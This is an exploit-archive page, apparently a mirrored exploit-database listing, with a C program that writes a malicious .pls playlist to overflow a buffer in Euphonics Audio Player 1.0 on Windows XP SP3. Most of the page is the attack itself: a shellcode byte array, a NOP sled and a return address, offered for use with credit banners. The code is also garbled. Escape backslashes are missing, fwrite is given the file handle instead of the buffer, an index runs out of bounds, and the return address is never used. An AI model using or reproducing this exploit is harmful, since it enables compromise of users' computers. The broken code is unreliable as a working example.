Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)
# Published : 2009-02-04
# Author : Single Eye
# Previous Title : Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit
# Next Title : BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit

#include <stdio.h>
#include <windows.h>
#include <string.h>
#define overflow 1324
#define NOP 0x90
#define pls "Eye.pls"

int main (int argc,char **argv)
{
char winsp3[] = "x7Bx46x86x7C";
char buffer[overflow];
FILE *Player;

unsigned char shellcode[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x96x7dxb2x83xebxfcxe2xf4x10x7ex39xb2xecx96xf6xf7"
"xd0x1dx01xb7x94x97x92x39xa3x8exf6xedxccx97x96xfb"
"x67xa2xf6xb3x02xa7xbdx2bx40x12xbdxc6xebx57xb7xbf"
"xedx54x96x46xd7xc2x59xb6x99x73xf6xedxc8x97x96xd4"
"x67x9ax36x39xb3x8ax7cx59x67x8axf6xb3x07x1fx21x96"
"xe8x55x4cx72x88x1dx3dx82x69x56x05xbex67xd6x71x39"
"x9cx8axd0x39x84x9ex96xbbx67x16xcdxb2xecx96xf6xda"
"xd0xc9x4cx44x8cxc0xf4x4ax6fx56x06xe2x84x66xf7xb6"
"xb3xfexe5x4cx66x98x2ax4dx0bxf5x1cxdex8fxb8x18xca"
"x89x96x7dxb2";

printf("n******************************************");
printf("n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *");
printf("n* THIS BUG C0DED BY SINGLE EYE           *");
printf("n* SPECIAL THANKS TO STR0KE               *");
printf("n******************************************");
memset(buffer,NOP,overflow);
memcpy(buffer,shellcode,sizeof(shellcode)-1);
buffer[overflow] = 0;
Player = fopen(pls,"w+");
fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
fclose(Player);
printf("n DOne Poc !!");
return 0;
}

// www.Syue.com [2009-02-04]